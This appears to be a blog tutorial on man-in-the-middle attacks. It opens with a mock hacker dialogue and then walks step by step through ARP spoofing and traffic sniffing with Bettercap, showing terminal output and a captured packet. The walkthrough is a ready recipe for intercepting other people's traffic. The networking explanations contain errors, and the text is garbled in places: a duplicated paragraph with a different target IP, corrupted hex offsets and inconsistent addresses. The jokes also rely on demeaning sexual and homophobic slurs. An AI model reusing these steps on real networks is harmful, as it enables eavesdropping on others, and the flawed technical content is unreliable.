HACKER: You know, you've been walking around, thinking everything's fine, right? Your Wi-Fi's secure, your passwords are strong. You've got two-factor authentication turned on... so you think you're safe. But guess what? You've been living in the digital wild, thinking your encryption's your shield, while there's a sniper on the roof just waiting for the right moment.
YOU: What sniper? I have strong passwords.
HACKER: Cute. But those passwords? They're just data in transit. And guess what? Data doesn't stay where you think it does. Every time you connect to Wi-Fi, you've got a chance someone's watching you. Ever heard of a Man-in-the-Middle attack? No? Well, you're about to.
YOU: So someone's spying on my Wi-Fi?
HACKER: Not just spying. They're intercepting everything. Your emails, your private chats, your credit card info, your dumb cat memes. Everything is floating through the air like an open book. A book anyone with the right tools can read. And, trust me, they're reading it.
YOU: What do I do about it?
HACKER: Simple. You learn how to hack back. You don't sit idly by while your private data is out there. You sniff the airwaves, you intercept traffic, you see what they see. Only then can you understand the game being played on you. And when you see it... well, let's just say ignorance is no longer an option. Welcome to the real internet.
[ What is MITM Attack ? ]
You might think that what you do on your phone while lying on your bed—messaging your crush, posting memes to annoy people on Instagram—is private and safe. After all, it seems totally private, right? Well, that is until you realize someone with decent networking skills is connected to the same Wi-Fi network as you. Yes, they can actually see and read everything you do on your phone. Wait, what? Is my home network really that vulnerable? How the heck can they do that? Well, to answer your first question, it's not really considered a “vulnerability” because that's just how networking works. As for your second question—Welcome to the world of Man-in-the-Middle (MITM) attacks.
Imagine you're texting someone (maybe a low-budget hooker, or maybe a gay one, whatever works for you), and you're wondering how your message reaches the other person. Well, to understand that, we need to take a look at how your phone connects to Wi-Fi. Every device that connects to the internet—whether it's a phone, laptop, or PC—has a unique identifier called a MAC address. This is burned into the device's network card. When you connect to your home Wi-Fi, your router sees your MAC address and stores it in its memory. Every device connected to that same network has its own MAC address stored in the router, which helps the router know where to send data. So, when you send a message, for example, it travels through the air as data packets. I'll explain what these packets are and what they contain later. For now, know that your router receives these packets and knows they're coming from your device because it matches your MAC address. The router then sends it to the correct destination (like, say, the Telegram server where you're messaging your "special" someone). The same thing happens when your friend replies. His router gets the message, sees his MAC address, and sends it to his phone. This whole process happens very quickly, almost instantly.
Now, here's where MITM attackers get involved. They don't hack the messages directly; instead, they position themselves in between you and the server (or your “hooker,” in this case). The trick they use is something called ARP poisoning. Here's how it works: if a hacker is on the same Wi-Fi network, they can change their MAC address to look like the router's. At the same time, they can send false information to the router, making it think that the hacker is the device you're trying to communicate with. In short, when you send a message to your "hooker," the hacker can intercept it, read it, and even change it. They basically become a "man in the middle" between you and the person you're messaging. And yes, they can see everything.
Now, before you get scared and think you're a target, let's look at how this actually works. And then we'll dive into ways you can protect yourself from this kind of attack. I'm going to demonstrate how we can sniff the network using Linux and a tool called Bettercap (don't worry, it works on Windows and macOS too, though the setup might differ). If you're not familiar with Bettercap, it's a powerful tool for sniffing and manipulating network traffic. In the next section, we'll walk through how to set up Bettercap, and later, we'll look at the security steps you can take to stop this kind of attack from happening to you.
[ What's inside the Packets? ]
So, when you're sending your steamy messages to your cheap gay hooker, those messages don't just travel over the network as one solid chunk. Instead, they get broken down into little packets. Each packet is like a tiny envelope containing part of your message.
The first part of the packet is the header, which is like the address on the envelope. It tells the router where the packet is going and who is sending it. The header contains the source address (your phone's MAC address), the destination address (the hooker's phone's MAC address), and the packet type (whether it’s a text, image, or meme). Imagine the packet's envelope has a label saying “Warning: Contains spicy content.”
Then, there's the payload, which is the juicy part of the packet, containing the actual data of your message. For instance, if you're texting “Wanna see a pic of my…”, only part of that sentence goes into one packet's payload. Other packets will carry the rest of your message, so it's all divided up.
Next, before these packets get sent, they get checked by something called the checksum, which acts like a security guard at the strip club, making sure everything is safe. The checksum makes sure the packet hasn't been tampered with while traveling. If anything's wrong, the packet gets re-sent.
Finally, there's the footer, which is like the seal on the envelope. It marks the end of the packet and tells the network that it's done its job. So, when these packets reach the hooker's phone, they're reassembled back into your original message.
In the end, the message you sent is chopped up into little parts, packaged, checked, and sealed, and then reassembled perfectly on the other end, even though the packets traveled across different paths to get there. This is how your texting, or whatever else gets delivered, but with packets breaking it all into smaller pieces.
[ Hands on Experience with Bettercap ]
Let's dive into a hands-on experience with bettercap for performing a man-in-the-middle Attack. Before we start, remember that this should only be done on networks that you own or have explicit permission to test. Do not perform MITM Attacks on public or unauthorized networks. it's illegal and unethical.
Installing Bettercap
Well, first things first, you need to install bettercap on your system. As I said earlier, this process varies based on your operating system, but here is a quick guide for Linux:
╭─ ~/Downloads 08:47:13 AM ─╮
╰─❯ sudo apt-get install bettercap ─╯
[sudo] password for guy:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
bettercap is already the newest version (2.32.0-1ubuntu0.22.04.3).
0 upgraded, 0 newly installed, 0 to remove and 2 not upgraded.
╭─ ~/Downloads 4s 08:47:24 AM ─╮
╰─❯ After you have installed it, you can double check whether if the bettercap is correctly installed on your operating system by running this command:
╭─ ~/Downloads 4s 08:47:24 AM ─╮
╰─❯ bettercap --version ─╯
bettercap v2.32.0 (built for linux amd64 with go1.18.1)
╭─ ~/Downloads 08:49:21 AM ─╮
╰─❯ Running Bettercap
To run the bettercap, you need to pass a wireless interface as an argument along with the bettercap command. If you're using Linux, you can identify your wireless interface by typing the following command in your little cute terminal.
╭─ ~/Downloads 09:04:32 AM ─╮
╰─❯ ifconfig ─╯
enp2s0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 08:8f:c3:68:bd:2d txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 171132 bytes 1293743345 (1.2 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 171132 bytes 1293743345 (1.2 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlp3s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.159 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 2001:e68:544f:7c-8:d8f3:170a:93ef:3a72 prefixlen 64 scopeid 0x0<global>
inet6 2001:e68:544f:7c08:12c4:3507:e3ca:18e5 prefixlen 64 scopeid 0x0<global>
inet6 fe80::f65b:7co8:e22e:8988 prefixlen 64 scopeid 0x20<link>
ether d8:80:90:93:f4:55 txqueuelen 1000 (Ethernet)
RX packets 1717108 bytes 2177660990 (2.1 GB)
RX errors 0 dropped 2 overruns 0 frame 0
TX packets 632855 bytes 99261212 (99.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╭─ ~/Downloads 09:04:33 AM ─╮
╰─❯ As you can see when you execute this command, you'll see a list of networko interfaces on your computer. Look for the one that represents your Wi-Fi connection. Typically, it might be named something like wlan0, wlp2s0, wlp3s0, or wlan1. This is the wireless interface your laptop or computer is using to connect to the network. Mine is using wlp3s0 so I am gonna launch Bettercap by passing it as an argument.
╭─ ~/Downloads 09:08:42 AM ─╮
╰─❯ sudo bettercap --iface wlp3s0 ─╯
[sudo] password for guy:
bettercap v2.32.0 (built for linux amd64 with go1.18.1) [type 'help' for a list of commands]
192.168.0.0/24 > 192.168.0.159 » [09:08:48] [sys.log] [inf] gateway monitor started ...
192.168.0.0/24 > 192.168.0.159 »
After running the command, you'll notice that Bettercap is up and running. You'll see some information about the network interface and possibly some details about your network. Now, to see what kind of commands we can use in Bettercap, you can type the following command:
192.168.0.0/24 > 192.168.0.159 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
c2 > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
hid > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mdns.server > not running
mysql.server > not running
ndp.spoof > not running
net.probe > not running
net.recon > not running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
ui > not running
update > not running
wifi > not running
wol > not running
192.168.0.0/24 > 192.168.0.159 »
- arp.spoof: This module lets you perform ARP (Address Resolution Protocol) spoofing, where you trick devices into thinking you’re the router.
- net.probe: This scans the network to discover active devices.
- net.recon: This enables network reconnaissance, gathering juicy information about connected devices.
- net.sniff: This captures packets traveling on the network so you can inspect them.
Sniffing with Bettercap
To begin sniffing on our network, the first step is to enable the arp.spoof module. But before diving in, let's explore what submodules are available within the arp.spoof. For this, we will use the following command in Bettercap.
192.168.0.0/24 > 192.168.0.159 » help arp.spoof
arp.spoof (not running): Keep spoofing selected hosts on the network.
arp.spoof on : Start ARP spoofer.
arp.ban on : Start ARP spoofer in ban mode, meaning the target(s) connectivity will not work.
arp.spoof off : Stop ARP spoofer.
arp.ban off : Stop ARP spoofer.
Parameters
arp.spoof.fullduplex : If true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail). (default=false)
arp.spoof.internal : If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the external network. (default=false)
arp.spoof.skip_restore : If set to true, targets arp cache wont be restored when spoofing is stopped. (default=false)
arp.spoof.targets : Comma separated list of IP addresses, MAC addresses or aliases to spoof, also supports nmap style IP ranges. (default=<entire subnet>)
arp.spoof.whitelist : Comma separated list of IP addresses, MAC addresses or aliases to skip while spoofing. (default=)
192.168.0.0/24 > 192.168.0.159 »
As you can see, there are some parameters we can use before enabling the arp.spoof module. The ones we are interest in are arp.spoof.fullduplex and arp.spoof.target. Let's enable the fullduplex first.
192.168.0.0/24 > 192.168.0.159 » set arp.spoof.fullduplex true
192.168.0.0/24 > 192.168.0.159 »
Now, before we enable the arp.spoof.targets, we have to know our target's IP address. To get that, we have to run another module called net.probe.
192.168.0.0/24 > 192.168.0.159 » net.probe on
192.168.0.0/24 > 192.168.0.159 » [09:47:18] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
192.168.0.0/24 > 192.168.0.159 » [09:47:18] [sys.log] [inf] net.probe probing 256 addresses on 192.168.0.0/24
192.168.0.0/24 > 192.168.0.159 » [09:47:18] [endpoint.new] endpoint 192.168.0.106 detected as 84:30:95:a2:0d:b6 (Hon Hai Precision IND.CO.,LTD).
192.168.0.0/24 > 192.168.0.159 » [09:47:19] [endpoint.new] endpoint 192.168.0.103 detected as 3a:79:66:8f:0c:c5.
192.168.0.0/24 > 192.168.0.159 » [09:47:20] [endpoint.new] endpoint 192.168.0.156 detected as fc:1d:2a:d6:16:45.
192.168.0.0/24 > 192.168.0.159 » [09:47:20] [endpoint.new] endpoint 192.168.0.157 detected as 90:2b:d2:a1:aa:9b (Huawei Technologies Co.,Ltd).
192.168.0.0/24 > 192.168.0.159 » [09:47:20] [endpoint.new] endpoint 192.168.0.100 detected as aa:ef:08:3f:0e:22.
192.168.0.0/24 > 192.168.0.159 »
192.168.0.0/24 > 192.168.0.159 » net.show
┌───────────────┬───────────────────┬─────────────────────────────────────────────┬────────────────────────────────┬────────┬────────┬──────────┐
│ IP ▴ │ MAC │ Name │ Vendor │ Sent │ Recvd │ Seen │
├───────────────┼───────────────────┼─────────────────────────────────────────────┼────────────────────────────────┼────────┼────────┼──────────┤
│ 192.168.0.159 │ d8:80:83:93:f4:55 │ wlp3s0 │ │ 0 B │ 0 B │ 09:08:48 │
│ 192.168.0.1 │ 58:c5:7e:dd:57:61 │ gateway │ │ 288 kB │ 128 kB │ 09:08:48 │
│ │ │ │ │ │ │ │
│ 192.168.0.101 │ aa:ef:08:3f:0e:22 │ │ │ 11 kB │ 28 kB │ 10:06:43 │
│ 192.168.0.100│ 84:c7:ea:3f:3f:cb │ │ Sony Mobile Communications Inc │ 24 kB │ 5.3 kB │ 10:07:00 │
│ 192.168.0.103 │ 3a:79:66:8f:0c:c5 │ │ │ 57 kB │ 658 kB │ 10:06:56 │
│ 192.168.0.106 │ 84:30:95:a2:0d:b6 │ bf0f0103-558c-d7e9-cf7c-9f1ca8e67d2a.local. │ Hon Hai Precision IND.CO.,LTD │ 680 kB │ 478 kB │ 10:06:56 │
│ 192.168.0.156 │ fc:1d:2a:d6:16:45 │ │ │ 464 kB │ 335 kB │ 10:06:55 │
│ 192.168.0.157 │ 90:2b:d2:a1:aa:9b │ │ Huawei Technologies Co.,Ltd │ 101 MB │ 272 MB │ 10:06:59 │
└───────────────┴───────────────────┴─────────────────────────────────────────────┴────────────────────────────────┴────────┴────────┴──────────┘
↑ 2.6 MB / ↓ 388 MB / 847825 pkts
192.168.0.0/24 > 192.168.0.159 »
So now that I got my sony device's IP address, let's set our target using arp.spoof.targets. You can add multiple targets if you want by seperating the IP Addresses with commas.
192.168.0.0/24 > 192.168.0.159 » set arp.spoof.targets 192.168.0.100
192.168.0.0/24 > 192.168.0.159 »
So now that I got my sony device's IP address, let's set our target using arp.spoof.targets. You can add multiple targets if you want by seperating the IP Addresses with commas.
192.168.0.0/24 > 192.168.0.159 » set arp.spoof.targets 192.168.0.102
192.168.0.0/24 > 192.168.0.159 »
Now that we have done all the steps required, we are ready to sniff on the network. But before that, you need to know that sniffing the network gives a lots of unwanted informations and the terminal could become hard to read. So to prevent we are gonna filter the traffic make it to only show the HTTP traffic.
192.168.0.0/24 > 192.168.0.159 » set net.sniff.filter "http"
192.168.0.0/24 > 192.168.0.159 »
192.168.0.0/24 > 192.168.0.159 » set net.sniff.on
192.168.0.0/24 > 192.168.0.159 »
POST /mmtls/4c7979d6 HTTP/1.1
Host: dns.wechat.com
Upgrade: mmtls
User-Agent: MicroMessenger Client
Accept: */*
Cache-Control: no-cache
Connection: close
Content-Length: 372
Content-Type: application/octet-stream
00000000 16 f1 00 01 6f 00 00 01 6b 00 04 f1 02 c0 2b 00 |....o...k.....+.|
00008888 a8 50 ae 11 f3 83 8d 46 c0 e4 f3 a0 31 d1 98 c9 |.P.....F....1...|
00000020 4b d6 81 5f 01 d3 0a 09 b9 c6 8a 00 81 8b ad 12 |K.._............|
00000030 48 67 95 a0 f6 00 00 01 3b 02 00 00 00 8c 00 0f |Hg......;.......|
00000040 01 00 00 00 85 02 00 27 8d 00 00 00 00 00 00 3d |.......'.......=|
00000050 00 0c 27 00 f1 a5 ca 56 6c d8 4a 2c 18 54 00 6a |..'....Vl.J,.T.j|
00000060 a1 8b f4 37 6e 11 da 66 29 00 ef 40 29 64 46 41 |...7n..f)..@)dFA|
00006666 f2 20 21 4f 1a ae eb b7 df fa 13 ff 38 13 7a 04 |. !O........8.z.|
00040432 7d a7 4c 50 e8 92 0f da e6 d8 69 00 be 2b 80 df |}.LP......iM.+..|
00000090 e7 b0 f5 8c 60 f6 a2 96 62 20 04 2d 35 7f 88 55 |.......b .-5..U|
000000a0 a1 d4 74 92 f4 f4 e3 4f b7 b7 21 8d 55 00 24 03 |..t.F..O..!...$.|
000000b0 c4 56 95 00 a4 73 8c e6 7d bd f6 46 ea ff e8 66 |.V...s....F...f.|
000000c0 b8 0e f3 68 bc 24 2f d1 da 78 00 00 00 a6 00 10 |...h.$/..x......|
000000d0 02 00 00 00 47 00 00 00 07 00 41 04 2f ac 18 6b |....G.....A./..k|
24444232 2d e2 b4 d1 67 98 00 14 8b cc 15 39 58 10 e3 1f |-...g.1....9X...|
000000f0 a1 48 24 28 ea 98 ee 8a 04 76 76 a2 6b 3b 22 b8 |.H$(.....vv.k;".|
00000100 77 00 c4 00 57 d1 8f f8 e9 c3 37 59 a2 7e fc 2c |wK.!W.....7Y.~.,|
00000110 cb 1c 1c 1a 32 c4 cb 46 95 f2 53 d9 00 00 00 47 |....2..F..S....G|
00000120 00 00 03 e8 00 41 04 df 7d ea 00 1a 91 00 86 97 |.....A..}....d..|
00400400 d5 59 f1 00 51 39 e5 cb df 00 64 bf 80 fb 93 62 |.Y..Q9....d....b|
00000140 70 08 73 c3 c7 56 c7 00 78 b3 24 83 c0 c1 c6 58 |p.s..V..x.$....X|
00000150 86 ef f4 0d 1a 26 d3 72 be 55 00 61 01 f1 bf e7 |.....&.r.U.a....|
00000444 18 35 f2 3e 1d da b3 00 00 00 00 02 00 00 00 05 |.5.>............|
00000170 00 00 03 e8 So, there you have it—an example of a packet we sniffed from the network. I know, it looks like a confusing mix of random stuff, and honestly, it's not exactly useful. But trust me, there were some spicy details in other packets that I had to hide because, well, privacy. (I'm not trying to get into trouble here!) What this really shows is just how much invisible chatter is flying around in your network. Some of it is boring, like "Hi, I'm just checking the connection," and some of it can be seriously revealing, like your search history. That's why securing your network is super important unless you're okay with someone knowing how often you go to that some juicy websites at 2 AM. Anyway, sniffing packets is a fun way to peek behind the curtain of how networks work. Just remember, this isn't a license to be a creep. Use tools like Bettercap responsibly, or you might end up explaining your internet habits to someone in a uniform. Stay curious but stay ethical!